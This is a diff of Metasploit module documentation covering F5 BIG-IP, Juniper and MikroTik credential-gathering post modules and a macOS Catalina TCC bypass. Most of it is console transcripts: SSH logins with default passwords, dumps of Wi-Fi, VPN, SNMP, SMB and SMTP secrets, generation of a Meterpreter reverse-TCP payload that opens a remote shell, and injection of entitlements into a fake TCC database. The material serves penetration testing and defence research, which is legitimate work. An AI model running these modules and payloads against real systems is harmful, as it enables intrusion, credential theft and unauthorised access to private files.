+[+] 2.2.2.2:22 F5 previous hash EFt+B7/aTWwPwLoMd8KLYW4JB3K5B6301k4pGsoWnZEb2yUbvEJgNU3FcLHo0S4QvdrwVcKrNtHLzebC7HizHQ==
+[*] Gathering info from cat /config/bigip.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144005_default_2.2.2.2_F5.bigip.conf_401821.txt
+[+] 2.2.2.2:22 SSL Key '/Common/f5_api_com.key' and hash $M$iE$cIdy72xi7Xbk3kazSrpdfscd+oD1pdsXJbwhvhMPiss4Iw0RKIJQS/CuSReZl/+kseKpPCNpBWNWOOaBCwlQ0v4sl7ZUkxCymh5pfFNAjhc= for /config/ssl/ssl.key/f5_api_com.key
+[*] Gathering info from cat /config/bigip_base.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144010_default_2.2.2.2_F5.bigip_base.co_869534.txt
+[+] 2.2.2.2:22 SNMP Community 'public' with RO access
+[+] 2.2.2.2:22 Hostname: f5bigip.ragegroup.com
+[+] 2.2.2.2:22 MAC Address: 00:0c:29:18:49:c7
+[+] 2.2.2.2:22 Management IP: 2.2.2.2
+[+] 2.2.2.2:22 Product BIG-IP
+[+] 2.2.2.2:22 OS Version: 15.1.0.2
+[*] Gathering info from cat /config/bigip_gtm.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144015_default_2.2.2.2_F5.bigip_gtm.con_315221.txt
+[*] Gathering info from cat /config/bigip_script.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144020_default_2.2.2.2_F5.bigip_script._498011.txt
+[*] Gathering info from cat /config/bigip_user.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144025_default_2.2.2.2_F5.bigip_user.co_687618.txt
+[*] Gathering info from cat /config/user_alert.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144030_default_2.2.2.2_F5.user_alert.co_138139.txt
+[*] Post module execution completed
+```
+
@@ -1,37 +1,39 @@
 ## Vulnerable Application

-  This module has been tested on the following hardware/OS combinations.
+This module has been tested on the following hardware/OS combinations.

-  * ScreenOS
-  * JunOS
-    * ex2200-48t-4g, JUNOS Base OS boot 12.3R7.7
+* ScreenOS
+* JunOS
+  * ex2200-48t-4g, JUNOS Base OS boot 12.3R7.7

-  The ex2200 config can be found [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_ex2200.config)
+The ex2200 config can be found [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_ex2200.config)

-  This module will look for the follow parameters which contain credentials:
+This module will look for the following parameters which contain credentials:

-  * ScreenOS
-    * admin
-    * user
-    * SNMP
-    * ppp
-    * ike
-  * JunOS
-    * root-authentication
-    * user
-    * SNMP
-    * radius
-    * pptp/ppp (pap)
+* ScreenOS
+  * admin
+  * user
+  * SNMP
+  * ppp
+  * ike
+* JunOS
+  * root-authentication
+  * user
+  * SNMP
+  * radius
+  * pptp/ppp (pap)

 ## Verification Steps

  1. Start msfconsole
  2. Get a shell
-  3. Do: ```use post/juniper/gather/enum_juniper```
+  3. Do: ```use post/networking/gather/enum_juniper```
  4. Do: ```set session [id]```
  5. Do: ```set verbose true```
  6. Do: ```run```

+## Options
+
 ## Scenarios

 ### ex2200-48t-4g, JUNOS Base OS boot 12.3R7.7
@@ -39,6 +41,26 @@
 #### root Login (SSH Shell)

 ```
+msf5 > auxiliary/scanner/ssh/ssh_login
+msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5
+rhosts => 192.168.1.5
+msf5 auxiliary(scanner/ssh/ssh_login) > set username root
+username => root
+msf5 auxiliary(scanner/ssh/ssh_login) > set password Juniper
+password => Juniper
+msf5 auxiliary(scanner/ssh/ssh_login) > run
+
+[+] 192.168.1.5:22 - Success: 'root:Juniper' 'Hostname: h00dieJuniperEx2200, Model: ex2200-48t-4g, JUNOS Base OS boot [12.3R7.7]'
+[*] Command shell session 1 opened (192.168.1.6:45623 -> 192.168.1.5:22) at 2020-07-14 20:48:58 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+```
+msf5 auxiliary(scanner/ssh/ssh_login) > use post/networking/gather/enum_juniper 
+msf5 post(networking/gather/enum_juniper) > set session 1
+session => 1
+msf5 post(networking/gather/enum_juniper) > run
 [*] In an SSH shell
 [*] Getting version information
 [*] Original OS Guess junos, is now JunOS 12.3R7.7
@@ -59,7 +81,7 @@
 [+] radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV
 [+] PPTP username 'pap_username' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP
 [*] Post module execution completed
-msf5 post(juniper/gather/enum_juniper) > creds
+msf5 post(networking/gather/enum_juniper) > creds
 Credentials
 ===========

@@ -83,11 +105,23 @@ host         origin       service            public          private
 #### cli Login

 ```
+msf5 > auxiliary/scanner/ssh/ssh_login
+msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5
+rhosts => 192.168.1.5
+msf5 auxiliary(scanner/ssh/ssh_login) > set username newuser
+username => newuser
+msf5 auxiliary(scanner/ssh/ssh_login) > set password Newuser
+password => Newuser
+msf5 auxiliary(scanner/ssh/ssh_login) > run
+
 [+] 192.168.1.5:22 - Success: 'newuser:Newuser' 'Hostname: h00dieJuniperEx2200, Model: ex2200-48t-4g, JUNOS Base OS boot [12.3R7.7]'
 [*] Command shell session 2 opened (192.168.1.6:45623 -> 192.168.1.5:22) at 2018-02-19 21:32:20 -0500
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-resource (juniper_ex2200.rc)> use post/juniper/gather/enum_juniper
+```
+
+```
+resource (juniper_ex2200.rc)> use post/networking/gather/enum_juniper
 resource (juniper_ex2200.rc)> set session 2
 session => 2
 resource (juniper_ex2200.rc)> set verbose true
@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+This module has been tested on the following hardware/OS combinations.
+
+* RouterOS 6.45.9 OVA
+
+The image is available from MikroTik [here](https://download.mikrotik.com/routeros/6.45.9/chr-6.45.9.ova)
+
+This module runs the following commands to gather data:
+
+* `/system package print without-paging`
+* `/export verbose`
+
+This module will look for the follow parameters which contain credentials:
+
+* `/interface ovpn-client`
+* `/interface pppoe-client`
+* `/interface l2tp-client`
+* `/interface pptp-client`
+* `/snmp community`
+* `/ppp secret`
+* `/ip smb users`
+* `/tool e-mail`
+* `/interface wireless security-profiles`
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a shell
+3. Do: ```use post/networking/gather/enum_mikrotik```
+4. Do: ```set session [id]```
+5. Do: ```set verbose true```
+6. Do: ```run```
+
+## Options
+
+## Scenarios
+
+### RouterOS 6.45.9 OVA Image on ESXi 6.7
+
+```
+resource (mikrotik.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (mikrotik.rb)> set username admin
+username => admin
+resource (mikrotik.rb)> set password password
+password => password
+resource (mikrotik.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (mikrotik.rb)> run
+[+] 1.1.1.1:22 - Success: 'admin:password' 'MikroTik CHR 6.45.9 (long-term)'
+[*] Command shell session 1 opened (2.2.2.2:41365 -> 1.1.1.1:22) at 2020-07-18 11:06:32 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+```
+resource (mikrotik.rb)> use post/networking/gather/enum_mikrotik
+resource (mikrotik.rb)> set session 1
+session => 1
+resource (mikrotik.rb)> set verbose true
+verbose => true
+resource (mikrotik.rb)> run
+[*] Getting version information
+[+] Flags: X - disabled 
+ #   NAME                    VERSION                    SCHEDULED              
+ 0   routeros-x86            6.45.9                                            
+ 1   system                  6.45.9                                            
+ 2 X ipv6                    6.45.9                                            
+ 3   ups                     6.45.9                                            
+ 4   wireless                6.45.9                                            
+ 5   hotspot                 6.45.9                                            
+ 6   mpls                    6.45.9                                            
+ 7   routing                 6.45.9                                            
+ 8   ppp                     6.45.9                                            
+ 9   dhcp                    6.45.9                                            
+10   security                6.45.9                                            
+11   advanced-tools          6.45.9                                            
+12   dude                    6.45.9                                            
+
+
+[+] Version information stored in to loot /home/h00die/.msf4/loot/20200718121308_default_1.1.1.1_mikrotik.version_923296.txt
+[*] Gathering info from /export verbose
+[+] 1.1.1.1:22 OS: RouterOS 6.45.9
+[+] 1.1.1.1:22 Wireless AP wpawifi with WPA password presharedkey
+[+] 1.1.1.1:22 Wireless AP wpa2wifi with WPA2 password presharedkey
+[+] 1.1.1.1:22 Wireless AP wpaeapwifi with WPA2-EAP username username password password
+[+] 1.1.1.1:22 Wireless AP wepwifi with WEP password 0123456789 with WEP password 0987654321 with WEP password 1234509876 with WEP password 0192837645
+[+] 1.1.1.1:22 Wireless AP wep1wifi with WEP password 1111111111
+[+] 1.1.1.1:22 disabled Open VPN Client to 10.99.99.98 on mac FE:45:B0:31:4A:34 named ovpn-out1 with username user and password password
+[+] 1.1.1.1:22 disabled Open VPN Client to 10.99.99.98 on mac FE:45:B0:31:4A:34 named ovpn-out2 with username user and password password
+[+] 1.1.1.1:22 disabled Open VPN Client to 10.99.99.98 on mac FE:45:B0:31:4A:34 named ovpn-out3 with username user and password password
+[+] 1.1.1.1:22 disabled Open VPN Client to 10.99.99.98 on mac FE:45:B0:31:4A:34 named ovpn-out4 with username user and password password
+[+] 1.1.1.1:22  PPPoE Client on ether2 named pppoe-user and service name internet with username user and password password
+[+] 1.1.1.1:22  L2TP Client to 10.99.99.99 named l2tp-hm with username l2tp-hm and password 123
+[+] 1.1.1.1:22  PPTP Client to 10.99.99.99 named pptp-hm with username pptp-hm and password 123
+[+] 1.1.1.1:22 SNMP community write with password write and write access
+[+] 1.1.1.1:22 SNMP community v3 with password 0123456789(SHA1), encryption password 9876543210(AES) and write access
+[+] 1.1.1.1:22  SMB Username mtuser and password mtpasswd
+[+] 1.1.1.1:22 disabled SMB Username disableduser and password disabledpasswd with RO only access
+[+] 1.1.1.1:22 disabled PPP tunnel bridging named ppp1 with profile name ppp_bridge and password password
+[+] 1.1.1.1:22 SMTP Username smtpuser and password smtppassword for 1.1.1.1:25
+[*] Post module execution completed
+```
@@ -0,0 +1,91 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in the TCC daemon on macOS Catalina
+(<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be
+manipulated (by setting the HOME environment variable) to use a new user
+controlled location as the TCC database. We can then grant ourselves
+entitlements by inserting them into this new database.
+
+## Verification Steps
+
+  1. Start msfconsole
+  1. Get a user session on OSX 10.15.5 (or lower)
+  1. Do: ```use post/osx/escalate/tccbypass```
+  1. Do: ```set SESSION -1```
+  1. Do: ```run```
+  1. Your session should now be able to access the ~/Documents folder
+
+## Scenarios
+
+### User level shell on macOS Catalina 10.15.4
+
+```
+msf6 > use payload/osx/x64/meterpreter/reverse_tcp
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lhost 192.168.135.197
+lhost => 192.168.135.197
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lport 4567
+lport => 4567
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > generate -f macho -o revtcpx64.mac
+[*] Writing 17204 bytes to revtcpx64.mac...
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+
+[*] Started reverse TCP handler on 192.168.135.197:4567 
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > [*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (799916 bytes) to 192.168.132.178
+[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.132.178:49156) at 2020-09-10 11:44:05 -0500
+
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer     : msfusers-Mac.local
+OS           : macOS Catalina (macOS 10.15.4)
+Architecture : x86
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+meterpreter > getuid
+Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
+meterpreter > ls Documents
+[-] 1009: Operation failed: 1
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > use post/osx/escalate/tccbypass 
+msf6 post(osx/escalate/tccbypass) > show options
+
+Module options (post/osx/escalate/tccbypass):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+msf6 post(osx/escalate/tccbypass) > set session 1
+session => 1
+msf6 post(osx/escalate/tccbypass) > set verbose true
+verbose => true
+msf6 post(osx/escalate/tccbypass) > run
+
+[*] Creating TCC directory /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC
+[+] fake TCC DB found: /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC/TCC.db
+[+] TCC.db was successfully updated!
+[*] To cleanup, run:
+launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
+rm -rf '/tmp/.SZulaEVB'
+
+[*] Post module execution completed
+msf6 post(osx/escalate/tccbypass) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
+meterpreter > ls Documents 
+Listing: Documents
+==================
+
+Mode              Size  Type  Last modified              Name
+----              ----  ----  -------------              ----
+100644/rw-r--r--  0     fil   2020-08-14 13:51:29 -0500  .localized
+
+meterpreter > 
+```
--- a/Show More
+++ b/Show More